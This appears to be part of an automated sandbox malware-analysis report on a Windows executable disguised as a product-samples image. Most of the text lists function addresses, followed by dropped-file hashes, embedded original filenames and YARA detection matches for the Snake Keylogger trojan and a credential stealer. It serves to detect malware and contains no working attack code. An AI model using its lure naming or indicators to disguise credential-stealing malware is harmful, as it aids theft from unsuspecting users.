                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DFAAF2_2_373DFAAF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DA49F2_2_373DA49F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DBC982_2_373DBC98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DBC872_2_373DBC87
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DD4802_2_373DD480
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DB2F82_2_373DB2F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DCAF02_2_373DCAF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D74E02_2_373D74E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DCAE02_2_373DCAE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DE2D82_2_373DE2D8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D74CF2_2_373D74CF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373D8CC82_2_373D8CC8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DE2CA2_2_373DE2CA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373DFAC02_2_373DFAC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740FB382_2_3740FB38
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374084702_2_37408470
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37401CF02_2_37401CF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B3402_2_3740B340
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740134F2_2_3740134F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B3502_2_3740B350
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740E5502_2_3740E550
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374013602_2_37401360
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374033612_2_37403361
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37409D612_2_37409D61
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740CF612_2_3740CF61
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37409D702_2_37409D70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740CF702_2_3740CF70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740DF002_2_3740DF00
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740AD012_2_3740AD01
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374005082_2_37400508
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740AD102_2_3740AD10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740DF102_2_3740DF10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740FB282_2_3740FB28
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740C9302_2_3740C930
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374097302_2_37409730
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37408DC02_2_37408DC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740BFC02_2_3740BFC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374009C12_2_374009C1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F1C92_2_3740F1C9
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740BFD02_2_3740BFD0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37408DD02_2_37408DD0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374009D02_2_374009D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F1D82_2_3740F1D8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A9E02_2_3740A9E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740DBE22_2_3740DBE2
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A9F02_2_3740A9F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740DBF02_2_3740DBF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374087802_2_37408780
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740EB802_2_3740EB80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B9822_2_3740B982
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B9902_2_3740B990
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374087902_2_37408790
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740EB902_2_3740EB90
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D5A02_2_3740D5A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A3A62_2_3740A3A6
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D5B02_2_3740D5B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A3B02_2_3740A3B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374000402_2_37400040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37409A402_2_37409A40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740CC402_2_3740CC40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37409A502_2_37409A50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740CC502_2_3740CC50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374084602_2_37408460
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B6612_2_3740B661
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B6702_2_3740B670
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740E8702_2_3740E870
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374094002_2_37409400
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740C6002_2_3740C600
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F8082_2_3740F808
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374094102_2_37409410
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740C6102_2_3740C610
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F8182_2_3740F818
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374018182_2_37401818
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740E2212_2_3740E221
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374018282_2_37401828
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740B0302_2_3740B030
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740E2302_2_3740E230
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A6C02_2_3740A6C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D8C02_2_3740D8C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A6D02_2_3740A6D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D8D02_2_3740D8D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374056D02_2_374056D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37401CDF2_2_37401CDF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374090E02_2_374090E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740C2E12_2_3740C2E1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F4E82_2_3740F4E8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374090F02_2_374090F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740C2F02_2_3740C2F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740F4F82_2_3740F4F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374004FA2_2_374004FA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D2802_2_3740D280
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A0822_2_3740A082
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37400E8D2_2_37400E8D
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740A0902_2_3740A090
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740D2902_2_3740D290
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37400E982_2_37400E98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740BCA12_2_3740BCA1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37408AA22_2_37408AA2
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740EEA82_2_3740EEA8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740BCB02_2_3740BCB0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37408AB02_2_37408AB0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3740EEB82_2_3740EEB8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374026B82_2_374026B8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3741DD582_2_3741DD58
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374177082_2_37417708
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374100402_2_37410040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374119402_2_37411940
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37414B402_2_37414B40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374167512_2_37416751
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374135502_2_37413550
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374103502_2_37410350
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374103602_2_37410360
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374135602_2_37413560
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374167602_2_37416760
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37411F712_2_37411F71
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374151702_2_37415170
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374113002_2_37411300
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374145002_2_37414500
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37412F102_2_37412F10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374161102_2_37416110
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37412F202_2_37412F20
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374161202_2_37416120
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374119312_2_37411931
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37414B322_2_37414B32
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374125C02_2_374125C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374157C02_2_374157C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374141D02_2_374141D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374173D92_2_374173D9
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37410FE02_2_37410FE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374141E02_2_374141E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374173E82_2_374173E8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37412BF12_2_37412BF1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37415DF02_2_37415DF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37411F802_2_37411F80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374151802_2_37415180
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37419D882_2_37419D88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374109912_2_37410991
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37413B902_2_37413B90
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37416D992_2_37416D99
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374109A02_2_374109A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37413BA02_2_37413BA0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37416DA82_2_37416DA8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374157B02_2_374157B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374132402_2_37413240
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374164402_2_37416440
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37411C502_2_37411C50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37414E502_2_37414E50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37411C602_2_37411C60
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37414E602_2_37414E60
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374106702_2_37410670
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3741BE702_2_3741BE70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_374138722_2_37413872
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37416A782_2_37416A78
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37412C002_2_37412C00
                Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll 3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Static PE information: invalid certificate
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878173364.0000000036939000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMsMpLics.dllj% vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878264779.000000003694D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMsMpLics.dllj% vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs Drawing_Products_Materials_and_Samples_IMG.exe
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
